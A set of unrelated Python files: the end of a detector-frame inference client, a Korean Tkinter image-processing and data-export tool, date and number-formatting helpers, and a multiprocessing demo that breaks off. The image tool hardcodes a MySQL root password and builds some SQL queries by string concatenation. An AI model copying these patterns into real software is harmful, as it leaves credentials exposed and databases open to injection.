            frame = pv['value'][0]['shortValue'].reshape((rows, cols))
            self.frame_tq.task_done()
            time0 = time.time()
            processed_frame, pr_frm_id = frame_preprocess(frame, frm_id)
            #print(processed_frame.max())
            #print(processed_frame.sum())
            #self.server.update(self.channel_name, self.frame_producer(frm_id, processed_frame))
            #processed_frame = self.debug_frames
            print("Time for pre-processing ", (time.time()-time0))
            #for _pf in processed_frame:
            self.processed_tq.put(processed_frame)
            self.frame_id_tq.put(frm_id)
            self.frames_processed += 1
            elapsed = (time.time() - time0)
            # Drain max_batch_size preprocessed frames into one batch.
            in_mb = []
            in_id = []  ## can be used to resent to the ImageJ
            for i in range(self.max_batch_size):
                _f = self.processed_tq.get()
                _id = self.frame_id_tq.get()
                in_mb.append(_f)
                in_id.append(_id)
                self.processed_tq.task_done()
                self.frame_id_tq.task_done()
            in_mb = np.array(in_mb)
            in_id = np.array(in_id)
            if (len(in_mb)==self.max_batch_size):
                #print("entered for inference")
                trt_outputs1, times = self.trt_inference_wrapper.infer(in_mb)
                trt_outputs = np.asarray(trt_outputs1[0])
                print(trt_outputs.shape)
                print("Execution Times ", times)
                #for _ in in_id:
                # NOTE(review): publishes under frm_id (the frame handled by
                # this loop iteration) even for batched input — confirm this
                # is intended when max_batch_size > 1.
                self.server.update(self.channel_name, self.frame_producer(frm_id, trt_outputs1[0]))
                print("Sent frame id", frm_id)
                self.avg_times += (time.time()-time0)
                print("Average time ", (time.time()-time0))

    def monitor(self, pv):
        """pvAccess monitor callback: enqueue a copy of each incoming frame."""
        uid = pv['uniqueId']
        # ignore the 1st empty frame when use sv simulator
        if self.recv_frames is None:
            self.recv_frames = 0
            return
        if self.base_seq_id is None: self.base_seq_id = uid
        self.recv_frames += 1
        self.frame_tq.put(pv.copy())
        logging.info("[%.3f] received frame %d, total frame received: %d, should have received: %d; %d frames pending process" % (\
            time.time(), uid, self.recv_frames, uid - self.base_seq_id + 1, self.frame_tq.qsize()))
#def main_monitor(ch, nth, pv_request):
# give threads seconds to exit
#c.stopMonitor()
#c.unsubscribe('monitor')
if __name__ == '__main__':
    # Command-line configuration for the edge-inference client.
    parser = argparse.ArgumentParser(description='')
    parser.add_argument('-gpus', type=str, default="0", help='list of visiable GPUs')
    parser.add_argument('-cn', type=str, default='QMPX3:test', help='pva channel name')
    parser.add_argument('-qs', type=int, default=10000, help='queue size')
    parser.add_argument('-nth', type=int, default=1, help='number of threads for frame processes')
    parser.add_argument('-terminal', type=int, default=0, help='non-zero to print logs to stdout')
    #parser.add_argument('-sf', type=int, default=0, help='specifies how many frames to skip')
    args, unparsed = parser.parse_known_args()

    if len(unparsed) > 0:
        print('Unrecognized argument(s): \n%s \nProgram exiting ... ... ' % '\n'.join(unparsed))
        exit(0)

    if len(args.gpus) > 0:
        os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus

    logging.basicConfig(filename='edgePtyhcoNN.log', level=logging.DEBUG,
                        format='%(asctime)s %(levelname)-8s %(message)s',)
    if args.terminal != 0:
        logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))

    # Subscribe the client's monitor callback to the detector channel.
    c = Channel(args.cn)
    client = pvaClient(args.nth)
    c.setMonitorMaxQueueLength(args.qs)
    time.sleep(1)
    pv_request = ''
    c.monitor(client.monitor, pv_request)
    time.sleep(1)

    # Wait until every queued/preprocessed frame has been consumed.
    client.frame_tq.join()
    client.processed_tq.join()
    client.frame_id_tq.join()
    #client.thr_exit = 1
    time.sleep(10000)
    # BUG FIX: `trt_inference_wrapper` was referenced as a bare name here and
    # raised NameError — the wrapper lives on the client instance.
    client.trt_inference_wrapper.destroy()
    c.stopMonitor()
|
Day12-02.py | ## 영상 처리 및 데이터 분석 툴
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
## 함수 선언부
def loadImage(fname) :
    """Load a square grayscale RAW file into the global input buffer.

    The image is assumed square: side length = sqrt(file size).
    Fills inImage (inH rows x inW cols of 0..255 ints) and inW/inH.
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    fsize = os.path.getsize(fname)           # file size in bytes
    inH = inW = int(math.sqrt(fsize))        # derive the (square) image side
    # Read the whole file at once instead of one byte per call, and use a
    # context manager so the handle is closed even on error (the original
    # leaked the handle on a short read and did 'fsize' tiny read(1) calls).
    with open(fname, 'rb') as fp:
        data = fp.read(inH * inW)
    # Slice the flat byte string into rows; bytes indexing yields ints.
    inImage = [[data[i * inW + k] for k in range(inW)] for i in range(inH)]
def openFile() :
    """Ask the user for a RAW file, load it and display it unmodified."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    filename = askopenfilename(
        parent=window,
        filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
    loadImage(filename)  # file -> input buffer
    equal()              # input buffer -> output buffer (+ display)
import threading
def display() :
    """Render the output buffer onto the canvas, subsampled to fit the view."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Tear down the previous canvas, if any.
    if canvas != None :
        canvas.destroy()
    # Fixed maximum view size.
    VIEW_X, VIEW_Y = 256, 256
    if VIEW_X >= outW or VIEW_Y >= outH :  # image fits: show it 1:1
        VIEW_X = outW
        VIEW_Y = outH
        step = 1  # pixel stride
    else :
        # Larger image: sample every `step`-th pixel to fit the view.
        step = int(outW / VIEW_X)
    window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
    canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
    paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
    canvas.create_image((VIEW_X/2, VIEW_X/2), image=paper, state='normal')
    # Paint pixels on a background thread so the UI stays responsive.
    def putPixel() :
        for i in range(0, outH,step) :
            for k in range(0, outW,step) :
                data = outImage[i][k]
                # Gray value replicated into an #rrggbb color string.
                paper.put('#%02x%02x%02x' % (data, data, data),
                          ( int(k/step),int(i/step)))
    threading.Thread(target=putPixel).start()
    canvas.pack(expand=1, anchor =CENTER)
    status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH) )
def equal() :  # identity transform
    """Copy the input image to the output buffer unchanged and display it."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Output has the same size as the input.
    outW = inW; outH = inH
    # Deep-copy the pixels row by row — replaces the original's zero-init
    # loops followed by an element-wise copy loop.
    outImage = [row[:] for row in inImage]
    display()
def addImage() :  # brighten
    """Brighten the image by a user-chosen amount, clamping at 255."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    outW = inW; outH = inH
    # Amount to add to every pixel (modal dialog).
    value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
    # min() replaces the original if/else clamp; comprehension replaces the
    # zero-init + fill loops.
    outImage = [[min(255, px + value) for px in row] for row in inImage]
    display()
def a_average() :  # mean gray level of input and output
    """Show the mean pixel value of the input and output images."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # sum(map(sum, ...)) replaces the manual accumulation loops.
    inRawAvg = int(sum(map(sum, inImage)) / (inH*inW))
    outRawAvg = int(sum(map(sum, outImage)) / (outH*outW))
    # Child window (owned by the main window) showing both averages.
    subWindow = Toplevel(window)
    subWindow.geometry('200x100')
    label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg) ); label1.pack()
    label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg)); label2.pack()
    subWindow.mainloop()
def a_histogram() :  # histogram window
    """Draw the normalized gray-level histogram of the output image."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    countList = [0] * 256; normalList = [0] * 256
    # Count occurrences of each gray level 0..255.
    for i in range(outH) :
        for k in range(outW) :
            value = outImage[i][k]
            countList[value] += 1
    # normalized = (count - min) * HIGH / (max - min)
    maxVal = max (countList); minVal = min(countList)
    for i in range(len(countList)) :
        normalList[i] = (countList[i] - minVal) * 256 / (maxVal - minVal)
    # Render the bars in a 256x256 child window.
    subWindow = Toplevel(window)
    subWindow.geometry('256x256')
    subCanvas = Canvas(subWindow, width=256, height=256)
    subPaper = PhotoImage(width=256, height=256)
    subCanvas.create_image((256/2,256/2), image=subPaper, state='normal')
    for i in range(0, 256) :
        # One vertical black bar per gray level, drawn bottom-up.
        for k in range(0, int(normalList[i])) :
            data = 0
            subPaper.put('#%02x%02x%02x' % (data, data, data), (i, 255-k))
    subCanvas.pack(expand=1, anchor=CENTER)
    subWindow.mainloop()
import matplotlib.pyplot as plt
def a_histogram2() :  # histogram via matplotlib
    """Plot the gray-level histogram of the output image with matplotlib."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    countList = [0] * 256
    # Tally every pixel of the output buffer.
    for row in outImage:
        for value in row:
            countList[value] += 1
    plt.plot(countList)
    plt.show()
def upDown() :  # vertical flip
    """Flip the input image top-to-bottom into the output buffer."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    outW = inW; outH = inH
    # BUG FIX: the original wrote outImage[outW-1-i][k], mirroring the row
    # index with the WIDTH — an IndexError / wrong result for non-square
    # images. A vertical flip must mirror rows over the height, which is
    # exactly reversing the row order.
    outImage = [row[:] for row in reversed(inImage)]
    display()
def panImage() :
    """Arm pan mode: the next click-drag on the window moves the image."""
    global panYN
    panYN = True
def mouseClick(event) :
    """Record the drag start point (only while pan mode is armed)."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global sx, sy, ex, ey, panYN
    if not panYN :
        return
    sx, sy = event.x, event.y
def mouseDrop(event):  # finish a pan drag: translate the image
    """Translate the image by the click-to-release drag vector."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global sx, sy, ex, ey, panYN
    if not panYN:
        return
    ex = event.x; ey = event.y;
    # Drag deltas; note the deliberate axis swap: screen x maps to column
    # offset `my`, screen y to row offset `mx`.
    my = sx - ex ; mx = sy - ey
    # Output has the same size as the input.
    outW = inW; outH = inH;
    outImage = []; tmpList = []
    for i in range(outH): # allocate zero-filled output buffer
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    #############################
    # actual image processing
    ############################
    # Copy each pixel to its shifted position, dropping pixels that move
    # outside the image bounds.
    for i in range(inH) :
        for k in range(inW) :
            if 0<= i-mx <outH and 0<= k-my < outW :
                outImage[i-mx][k-my] = inImage[i][k]
    panYN = False  # pan mode is one-shot
    display()
def zoomOut() :  # shrink by an integer factor
    """Shrink the input image by a user-chosen integer factor."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Output size = input size / scale (integer division).
    scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
    outW = int(inW/scale); outH = int(inH/scale);
    outImage = []; tmpList = []
    for i in range(outH): # allocate zero-filled output buffer
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    #############################
    # actual image processing
    ############################
    # Forward mapping: every source pixel maps onto a target cell, so each
    # target cell ends up holding the LAST source pixel that hit it
    # (nearest-sample shrink, no averaging).
    for i in range(inH) :
        for k in range(inW) :
            outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
    display()
import struct
def saveFile() :
    """Save the output image as raw 8-bit bytes, row by row."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    saveFp = asksaveasfile(parent=window, mode='wb',
        defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
    if saveFp is None:  # user cancelled the dialog
        return
    # BUG FIX: rows must iterate over outH and columns over outW; the
    # original swapped the bounds, which breaks for non-square images
    # (outImage has outH rows of outW pixels).
    for i in range(outH):
        for k in range(outW):
            saveFp.write( struct.pack('B', outImage[i][k]))
    saveFp.close()
def exitFile() :
    """Menu stub for 'quit' — intentionally does nothing yet."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    pass
import csv
def saveCSV() :
    """Export the output image as (row, col, value) CSV records."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    save_fp = asksaveasfile(parent=window, mode='w',
        defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
    if save_fp is None:  # user cancelled the dialog
        return
    output_file = save_fp.name
    # BUG FIX: the original left this dialog-opened handle open and wrote
    # through a second handle; close it before re-opening with newline=''.
    save_fp.close()
    header = ['Column', 'Row', 'Value']
    with open(output_file, 'w', newline='') as filewriter:
        csvWriter = csv.writer(filewriter)
        csvWriter.writerow(header)
        # BUG FIX: rows iterate over outH and columns over outW (the original
        # used outW/outH swapped — wrong for non-square images).
        for row in range(outH):
            for col in range(outW):
                csvWriter.writerow([row, col, outImage[row][col]])
    print('OK!')
def saveShuffleCSV() :
    """Placeholder for shuffled CSV export — not implemented yet."""
    pass
def loadCSV(fname) :
    """Load a (row, col, value) CSV produced by saveCSV into the input buffer.

    The image is assumed square: side = sqrt(number of data lines).
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # Count data lines (total minus the header) with the file safely closed
    # afterwards; the original's fsize = -1 + one per line is equivalent.
    with open(fname, 'r') as fp:
        fsize = sum(1 for _ in fp) - 1
    inH = inW = int(math.sqrt(fsize))  # derive the (square) image side
    # Zero-filled input buffer, one list per row.
    inImage = [[0] * inW for _ in range(inH)]
    with open(fname, 'r') as fp:
        csvFP = csv.reader(fp)
        next(csvFP)  # skip header
        for row_list in csvFP:
            row = int(row_list[0]); col = int(row_list[1]); value = int(row_list[2])
            inImage[row][col] = value
def openCSV() :
    """Ask the user for a CSV file, load it and display it unmodified."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    filename = askopenfilename(
        parent=window,
        filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
    loadCSV(filename)  # file -> input buffer
    equal()            # input buffer -> output buffer (+ display)
import sqlite3
def saveSQLite() :
    """Store the input image as (filename, resolution, row, col, value) rows
    in the local SQLite database file 'imageDB'."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global csvList, input_file
    con = sqlite3.connect('imageDB')  # open (or create) the database file
    cur = con.cursor()
    fname = os.path.basename(filename).split(".")[0]  # key: base name w/o extension
    # Create the table on first use instead of swallowing the
    # "already exists" error with a bare except.
    cur.execute("CREATE TABLE IF NOT EXISTS imageTable( filename CHAR(20), resolution smallint"
                ", row smallint, col smallint, value smallint)")
    # Parameterized bulk insert: prevents SQL injection through `filename`
    # and is far faster than one string-built INSERT per pixel. Rows iterate
    # inH, columns inW (the original swapped the bounds).
    rows = [(fname, inW, i, k, inImage[i][k])
            for i in range(inH) for k in range(inW)]
    cur.executemany("INSERT INTO imageTable VALUES(?,?,?,?,?)", rows)
    con.commit()
    cur.close()
    con.close()
    print('Ok!')
def openSQLite() :
    """Pick an image stored in the local SQLite DB and load it.

    Lists every distinct (filename, resolution) pair from imageTable in a
    chooser window; the selected image is read back into the input buffer.
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global csvList, input_file
    con = sqlite3.connect('imageDB')  # open (or create) the database file
    cur = con.cursor()                # cursor shared with the inner callback
    try :
        sql = "SELECT DISTINCT filename, resolution FROM imageTable"
        cur.execute(sql)
        tableNameList = []  # e.g. ['dog:128', 'dog:512' ....]
        while True :
            row = cur.fetchone()
            if row == None :
                break
            tableNameList.append( row[0] + ':' + str(row[1]) )
        ######## inner function: callback of the "select" button ########
        def selectTable() :
            global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
            selectedIndex = listbox.curselection()[0]
            subWindow.destroy()
            fname, res = tableNameList[selectedIndex].split(':')
            filename = fname
            # NOTE(review): string-built SQL; fname/res come from this DB so
            # risk is low, but parameterized queries would be safer.
            sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
                fname + "' AND resolution=" + res
            print(sql)
            cur.execute(sql)
            inH = inW = int(res)
            inImage = []; tmpList = []
            for i in range(inH): # allocate zero-filled input buffer
                tmpList = []
                for k in range(inW):
                    tmpList.append(0)
                inImage.append(tmpList)
            # Copy every (row, col, value) record into the buffer.
            while True :
                row_tuple = cur.fetchone()
                if row_tuple == None :
                    break
                row, col, value = row_tuple
                inImage[row][col] = value
            cur.close()
            con.close()
            equal()
            print("Ok! openSQLite")
        ################################################################
        subWindow = Toplevel(window)
        listbox = Listbox(subWindow)
        button = Button(subWindow, text='선택', command=selectTable)
        listbox.pack(); button.pack()
        for sName in tableNameList :
            listbox.insert(END, sName)
        subWindow.lift()
    except :
        # Any failure (missing table, closed connection): clean up and report.
        cur.close()
        con.close()
        print("Error! openSQLite")
import pymysql
def saveMySQL() :
    """Store the output image as (filename, resolution, row, col, value)
    rows in the remote MySQL database, replacing any previous copy."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global csvList, input_file
    con = pymysql.connect(host='192.168.174.129', user='root',
        password='1234', db='imageDB', charset='utf8')
    cur = con.cursor()
    fname = os.path.basename(filename).split(".")[0]  # key: base name w/o extension
    try:
        cur.execute("CREATE TABLE imageTable( filename CHAR(20), resolution smallint"
                    ", row smallint, col smallint, value smallint)")
    except pymysql.MySQLError:
        pass  # table already exists
    try:
        # Parameterized DELETE replaces the string-built one (SQL injection).
        cur.execute("DELETE FROM imageTable WHERE filename=%s AND resolution=%s",
                    (fname, outW))
        con.commit()
    except pymysql.MySQLError:
        pass  # nothing to delete
    # BUG FIX: the original iterated range(inW)/range(inH) while writing
    # outImage (outH rows x outW cols) — wrong whenever input and output
    # sizes differ. Also switched to a parameterized bulk insert.
    rows = [(fname, outW, i, k, outImage[i][k])
            for i in range(outH) for k in range(outW)]
    cur.executemany("INSERT INTO imageTable VALUES(%s,%s,%s,%s,%s)", rows)
    con.commit()
    cur.close()
    con.close()
    print('Ok! saveMySQL')
def openMySQL() :
    """Pick an image stored in the remote MySQL DB and load it.

    Mirrors openSQLite: lists distinct (filename, resolution) pairs in a
    chooser window; the selection is read back into the input buffer.
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    global csvList, input_file
    con = pymysql.connect(host='192.168.174.129', user='root',
        password='1234', db='imageDB', charset='utf8')
    cur = con.cursor()  # cursor shared with the inner callback
    try :
        sql = "SELECT DISTINCT filename, resolution FROM imageTable"
        cur.execute(sql)
        tableNameList = []  # e.g. ['dog:128', 'dog:512' ....]
        while True :
            row = cur.fetchone()
            if row == None :
                break
            tableNameList.append( row[0] + ':' + str(row[1]) )
        ######## inner function: callback of the "select" button ########
        def selectTable() :
            global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
            selectedIndex = listbox.curselection()[0]
            subWindow.destroy()
            fname, res = tableNameList[selectedIndex].split(':')
            filename = fname
            # NOTE(review): string-built SQL; values come from this DB so
            # risk is low, but parameterized queries would be safer.
            sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
                fname + "' AND resolution=" + res
            print(sql)
            cur.execute(sql)
            inH = inW = int(res)
            inImage = []; tmpList = []
            for i in range(inH): # allocate zero-filled input buffer
                tmpList = []
                for k in range(inW):
                    tmpList.append(0)
                inImage.append(tmpList)
            # Copy every (row, col, value) record into the buffer.
            while True :
                row_tuple = cur.fetchone()
                if row_tuple == None :
                    break
                row, col, value = row_tuple
                inImage[row][col] = value
            cur.close()
            con.close()
            equal()
            print("Ok! openMySQL")
        ################################################################
        subWindow = Toplevel(window)
        listbox = Listbox(subWindow)
        button = Button(subWindow, text='선택', command=selectTable)
        listbox.pack(); button.pack()
        for sName in tableNameList :
            listbox.insert(END, sName)
        subWindow.lift()
    except :
        # Any failure (connection refused, missing table): clean up, report.
        cur.close()
        con.close()
        print("Error! openMySQL")
import xlwt
def saveExcel1() :
    """Export the output image as a numeric grid into an .xls workbook."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    output_file = asksaveasfile(parent=window, mode='w',
        defaultextension="*.xls", filetypes=(("XLS파일", "*.xls"), ("모든파일", "*.*")))
    output_file = output_file.name
    # Sheet is named after the chosen file (base name without extension).
    sheetName = os.path.basename(output_file).split(".")[0]
    wb = xlwt.Workbook()
    ws = wb.add_sheet(sheetName)
    # One worksheet cell per pixel, same row/col layout as the image.
    for rowNum in range(outH):
        rowData = outImage[rowNum]
        for colNum in range(outW):
            ws.write(rowNum, colNum, rowData[colNum])
    wb.save(output_file)
    print('OK! saveExcel1')
import xlsxwriter
def saveExcel2() :
    """Export the output image as shaded cells into an .xlsx workbook
    (each cell's background color encodes the pixel's gray level)."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    output_file = asksaveasfile(parent=window, mode='w',
        defaultextension="*.xlsx", filetypes=(("XLSX파일", "*.xls"), ("모든파일", "*.*")))
    output_file = output_file.name
    sheetName = os.path.basename(output_file).split(".")[0]
    wb = xlsxwriter.Workbook(output_file)
    ws = wb.add_worksheet(sheetName)
    ws.set_column(0, outW, 1.0)   # ~0.34 cm wide
    for r in range(outH):
        ws.set_row(r, 9.5)        # ~0.35 cm tall
    # Cache one format object per distinct gray level — the original created
    # a new format for every single cell.
    formats = {}
    # BUG FIX: rows iterate over outH and columns over outW; the original
    # swapped the bounds (inconsistent with saveExcel1 and wrong for
    # non-square images).
    for rowNum in range(outH) :
        for colNum in range(outW) :
            data = outImage[rowNum][colNum]
            # Gray value replicated into a #rrggbb background color.
            hexStr = '#' + ('%02x' % data) * 3
            cell_format = formats.get(hexStr)
            if cell_format is None:
                cell_format = wb.add_format()
                cell_format.set_bg_color(hexStr)
                formats[hexStr] = cell_format
            ws.write(rowNum, colNum, '', cell_format)
    wb.close()
    print('OK! saveExcel2')
def a_histoStretch() :  # histogram stretching
    """Stretch the input's gray range to the full 0..255 span.

    OUT = (IN - min) * HIGH / (max - min), clamped to 0..255.
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    outW = inW; outH = inH
    HIGH = 255
    # Builtins replace the manual min/max scan loops.
    maxVal = max(max(row) for row in inImage)
    minVal = min(min(row) for row in inImage)
    spread = maxVal - minVal
    if spread == 0:
        # ROBUSTNESS: a flat image made the original divide by zero;
        # stretching is undefined, so pass the image through unchanged.
        outImage = [row[:] for row in inImage]
        display()
        return
    outImage = [[min(255, max(0, int((px - minVal) * HIGH / spread)))
                 for px in row] for row in inImage]
    display()
def a_endInSearch() :  # end-in search stretching
    """Histogram stretch after pulling both ends in by a user-chosen limit.

    max/min are moved `limit` levels toward each other before applying
    OUT = (IN - min) * HIGH / (max - min), clamped to 0..255 — this clips
    outliers at both ends and boosts mid-range contrast.
    """
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    outW = inW; outH = inH
    HIGH = 255
    # Builtins replace the manual min/max scan loops.
    maxVal = max(max(row) for row in inImage)
    minVal = min(min(row) for row in inImage)
    limit = askinteger('엔드인', '상하 범위:', minvalue=1, maxvalue=127)
    maxVal -= limit
    minVal += limit
    spread = maxVal - minVal
    if spread <= 0:
        # ROBUSTNESS: if the limit collapses (or inverts) the range the
        # original divided by zero; pass the image through unchanged.
        outImage = [row[:] for row in inImage]
        display()
        return
    outImage = [[min(255, max(0, int((px - minVal) * HIGH / spread)))
                 for px in row] for row in inImage]
    display()
def a_histoEqual() :  # histogram equalization
    """Equalize the input histogram via the normalized cumulative histogram."""
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    outW = inW; outH = inH
    HIGH = 255
    # BUG FIX: all three tables were sized [0]*255, so any pixel with gray
    # level 255 raised IndexError; they must cover all 256 levels.
    histo = [0] * 256
    for row in inImage:
        for value in row:
            histo[value] += 1
    # Cumulative histogram.
    sumHisto = []
    sVal = 0
    for cnt in histo:
        sVal += cnt
        sumHisto.append(sVal)
    # Normalized: (cumulative / pixel count) * HIGH.
    normalHisto = [int(s / (outW * outH) * HIGH) for s in sumHisto]
    # Map every input pixel through the lookup table.
    outImage = [[normalHisto[px] for px in row] for row in inImage]
    display()
## Global state shared by every handler
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
# panYN arms one-shot pan mode; sx/sy/ex/ey hold the drag coordinates.
panYN = False; sx, sy, ex, ey = [0] * 4
VIEW_X, VIEW_Y = 128, 128
status = None

## Main window and menu wiring
window = Tk(); window.geometry('400x400');
window.title('영상 처리&데이터 분석 Ver 0.91')
# Mouse bindings drive the pan feature (armed via the menu).
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
status = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
# File menu: open / save / quit.
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
# Point operations.
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
# Geometric operations.
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
# Analysis tools.
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
analyzeMenu.add_command(label='히스토그램', command=a_histogram)
analyzeMenu.add_command(label='히스토그램(matplotlib)', command=a_histogram2)
analyzeMenu.add_separator()
analyzeMenu.add_command(label='히스토그램 스트래칭', command=a_histoStretch)
analyzeMenu.add_command(label='엔드-인 탐색', command=a_endInSearch)
analyzeMenu.add_command(label='히스토그램 평활화', command=a_histoEqual)
# Import/export to other formats and databases.
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
otherMenu.add_separator()
otherMenu.add_command(label='Excel로 내보내기(숫자)', command=saveExcel1)
otherMenu.add_command(label='Excel로 내보내기(음영)', command=saveExcel2)
window.mainloop()
static.py | import zipfile
import datetime
from threading import Thread
from utility.setting import openapi_path
def thread_decorator(func):
    """Decorator that runs the wrapped function in a daemon thread.

    Fixes vs the original: keyword arguments are now forwarded, the wrapped
    function keeps its name/docstring via functools.wraps, and the started
    Thread is returned so callers may join() it (callers that ignored the
    previous None return are unaffected).
    """
    import functools

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        thread = Thread(target=func, args=args, kwargs=kwargs, daemon=True)
        thread.start()
        return thread
    return wrapper
def now():
    """Current local date and time."""
    return datetime.datetime.today()
def timedelta_sec(second, std_time=None):
    """Return std_time (or the current time) shifted by `second` seconds."""
    base = now() if std_time is None else std_time
    return base + datetime.timedelta(seconds=second)
def timedelta_hour(hour, std_time=None):
    """Return std_time (or the current time) shifted by `hour` hours."""
    base = now() if std_time is None else std_time
    return base + datetime.timedelta(hours=hour)
def timedelta_day(day, std_time=None):
    """Return std_time (or the current time) shifted by `day` days."""
    base = now() if std_time is None else std_time
    return base + datetime.timedelta(days=day)
def strp_time(timetype, str_time):
    """Parse `str_time` with format `timetype` into a datetime."""
    parsed = datetime.datetime.strptime(str_time, timetype)
    return parsed
def strf_time(timetype, std_time=None):
    """Format std_time (or the current time) with format `timetype`."""
    base = now() if std_time is None else std_time
    return base.strftime(timetype)
def changeFormat(text):
    """Format a number with thousands separators.

    Integers get plain comma grouping; non-integer text falls back to float
    formatting, and a single-digit fraction is padded to two digits
    (e.g. '1234.5' -> '1,234.50').
    """
    text = str(text)
    try:
        formatted = '{:,}'.format(int(text))
    except ValueError:
        formatted = '{:,}'.format(float(text))
    parts = formatted.split('.')
    if len(parts) >= 2 and len(parts[1]) == 1:
        formatted += '0'
    return formatted
def readEnc(trcode):
    """Read the .dat payload of an OpenAPI .enc archive as a cp949 string."""
    archive = zipfile.ZipFile(f'{openapi_path}/data/{trcode}.enc')
    payload = archive.read(trcode.upper() + '.dat')
    return payload.decode('cp949')
def parseDat(trcode, lines):
    """Parse a TR .dat description into its input/output record fields.

    Each section runs from a '@START' marker to the matching '@END'; the
    line immediately BEFORE '@START' decides whether it is an input or
    output section, the '@START' line itself names the record, and the
    lines in between list its fields.
    Returns {'trcode': ..., 'input': [{record: [fields]}], 'output': [...]}.
    """
    rows = lines.split('\n')
    starts = [i for i, text in enumerate(rows) if text.startswith('@START')]
    ends = [i for i, text in enumerate(rows) if text.startswith('@END')]
    enc_data = {'trcode': trcode, 'input': [], 'output': []}
    for s, e in zip(starts, ends):
        section = rows[s - 1:e + 1]
        kind = 'input' if 'INPUT' in section[0] else 'output'
        # Record name: text between the first '_' and the first '='.
        record = section[1].split('_')[1].strip().split('=')[0]
        # Field names: left-hand side of each 'name=desc' line.
        names = [text.split('=')[0].strip() for text in section[2:-1]]
        enc_data[kind].append({record: names})
    return enc_data
|
multipro.py | from multiprocessing import Process
import time
def sub1(txt):
    """Print `txt` with a counter once per second, 30 times."""
    for tick in range(30):
        time.sleep(1)
        print(txt, tick)
def main(p):
    """Print a counter four times (2 s apart), then stop `p` if still alive."""
    for step in range(4):
        time.sleep(2)
        print('main', step)
